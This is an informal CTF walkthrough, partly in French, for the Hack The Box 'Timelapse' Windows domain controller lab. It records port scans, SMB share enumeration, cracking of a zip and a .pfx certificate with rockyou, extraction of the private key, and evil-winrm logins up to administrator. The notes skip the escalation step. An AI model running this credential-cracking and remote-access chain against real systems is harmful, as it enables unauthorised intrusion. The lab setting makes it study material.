# Machine Timelapse ---- ```bash nmap -Pn -sC -sV 10.10.11.152 ``` ```nmap Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 15:48 EDT Nmap scan report for 10.10.11.152 Host is up (0.048s latency). Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-31 03:48:47Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h59m56s | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required | smb2-time: | date: 2022-05-31T03:48:54 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 57.80 seconds ``` ### nmblookup -A 10.10.11.152 ```bash= Looking up status of 10.10.11.152 No reply from 10.10.11.152 ``` ## enum4linux -a 10.10.11.152 ```bash= Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 30 15:58:32 2022 =========================================( Target Information )========================================= Target ........... 10.10.11.152 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ============================( Enumerating Workgroup/Domain on 10.10.11.152 )============================ [E] Can't find workgroup/domain ================================( Nbtstat Information for 10.10.11.152 )================================ Looking up status of 10.10.11.152 No reply from 10.10.11.152 ===================================( Session Check on 10.10.11.152 )=================================== [+] Server 10.10.11.152 allows sessions using username '', password '' ================================( Getting domain SID for 10.10.11.152 )================================ Domain Name: TIMELAPSE Domain Sid: S-1-5-21-671920749-559770252-3318990721 [+] Host is part of a domain (not a workgroup) ===================================( OS information on 10.10.11.152 )=================================== [E] Can't get OS info with smbclient [+] Got OS info for 10.10.11.152 from srvinfo: do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED =======================================( Users on 10.10.11.152 )======================================= [E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED [E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED =================================( Share Enumeration on 10.10.11.152 )================================= do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. Unable to connect with SMB1 -- no workgroup available [+] Attempting to map shares on 10.10.11.152 ============================( Password Policy Information for 10.10.11.152 )============================ [E] Unexpected error from polenum: [+] Attaching to 10.10.11.152 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:10.10.11.152) [+] Trying protocol 445/SMB... [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. [E] Failed to get password policy with rpcclient =======================================( Groups on 10.10.11.152 )======================================= [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ==================( Users on 10.10.11.152 via RID cycling (RIDS: 500-550,1000-1050) )================== [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. ===============================( Getting printer info for 10.10.11.152 )=============================== do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED enum4linux complete on Mon May 30 15:59:01 2022 ``` ### dig AXFR timelapse.htb0 @10.10.11.152 ```bash= ; <<>> DiG 9.18.1-1-Debian <<>> AXFR timelapse.htb0 @10.10.11.152 ;; global options: +cmd ; Transfer failed. ``` ### smbclient -L \\timelapse -I 10.10.11.152 -N ```bash= Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Shares Disk SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to timelapse failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` ### smbclient //timelapse/Shares -I 10.10.11.152 -N ```bash= Try "help" to get a list of possible commands. smb: \> dir . D 0 Mon Oct 25 11:39:15 2021 .. D 0 Mon Oct 25 11:39:15 2021 Dev D 0 Mon Oct 25 15:40:06 2021 HelpDesk D 0 Mon Oct 25 11:48:42 2021 6367231 blocks of size 4096. 2453069 blocks available ``` ### fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip ```bashrc= PASSWORD FOUND!!!!: pw == supremelegacy ``` ### pfx2john legacyy_dev_auth.pfx ```bashrc= big output ``` ### john pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt ```bashrc= Using default input encoding: UTF-8 Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x]) Cost 1 (iteration count) is 2000 for all loaded hashes Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status thuglegacy (legacyy_dev_auth.pfx) 1g 0:00:01:37 DONE (2022-05-30 17:11) 0.01028g/s 33232p/s 33232c/s 33232C/s thuglife06..thug211 Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` **Golden Certificate? ** ### extraire certificat pour cle priv et pub ## cle priv ```bashrc= openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out devauth-privkey.pem -nodes 1 ⨯ Enter Import Password: ``` ## cer ```bashrc= openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out devauth-cert.pem 1 ⨯ Enter Import Password: ``` ## Eric: vous aviez ce user? (de retour plus tard) ──(user00㉿kali)-[~] └─$ strings legacyy_dev_auth.pfx _ Er C(!, 4bz' `o<l |Y4W I0{Q L(vqQ# {q[l"8 `+$DOC hK*y ;5UERr X!+3 &JCy $-1f NAM'u "-r$$ Legacyy0 211025140552Z 311025141552Z0 Legacyy0 r"*J0: cZK3 ".G, x0v0 **legacyy@timelapse.htb0** }J5~f t{(lz 5&8H &4<6 kj@1 uUh2s ### user lister dans le certificate ```bashrc= openssl x509 -in devauth-cert.pem -noout -text ``` Certificate: Data: Version: 3 (0x2) Serial Number: 1d:99:89:29:8a:cf:11:bb:41:93:a1:cf:f4:4e:12:df Signature Algorithm: sha256WithRSAEncryption **Issuer: CN = Legacyy** Validity Not Before: Oct 25 14:05:52 2021 GMT Not After : Oct 25 14:15:52 2031 GMT Subject: CN = Legacyy Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:a5:56:07:a3:62:16:47:1e:e2:f3:4d:23:ad:61: 71:ce:8b:9e:b3:4a:87:2b:f6:89:bc:e7:86:03:bb: fe:aa:1c:16:b8:35:ff:31:14:fe:88:34:d0:4d:95: ### got first flag ## evil-winrm -i 10.10.11.152 -u Legacyy -p '' -c devauth-cert.pem -k devauth.key --ssl ```bashrc= Evil-WinRM shell v3.3 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: SSL enabled Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\legacyy\Documents> whoami timelapse\legacyy *Evil-WinRM* PS C:\Users\legacyy\Documents> dir Directory: C:\Users\legacyy\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/30/2022 11:52 PM 585075 Powerup.ps1 *Evil-WinRM* PS C:\Users\legacyy\Downloads> cd .. *Evil-WinRM* PS C:\Users\legacyy> cd Desktop *Evil-WinRM* PS C:\Users\legacyy\Desktop> dir Directory: C:\Users\legacyy\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/30/2022 11:58 PM 585075 Powerup.ps1 -ar--- 5/30/2022 2:44 AM 34 user.txt *Evil-WinRM* PS C:\Users\legacyy\Desktop> ``` ### pas encore root, mais un user de plus #### evil-winrm -i 10.10.11.152 -u svc_deploy -p '------here password' --ssl ```powershell= Evil-WinRM shell v3.3 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: SSL enabled Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami timelapse\svc_deploy ``` # Je vais me coucher.... ```powershell= *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami timelapse\administrator *Evil-WinRM* PS C:\Users\\Desktop> dir Directory: C:\Users\\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 5/30/2022 2:44 AM 34 root.txt ```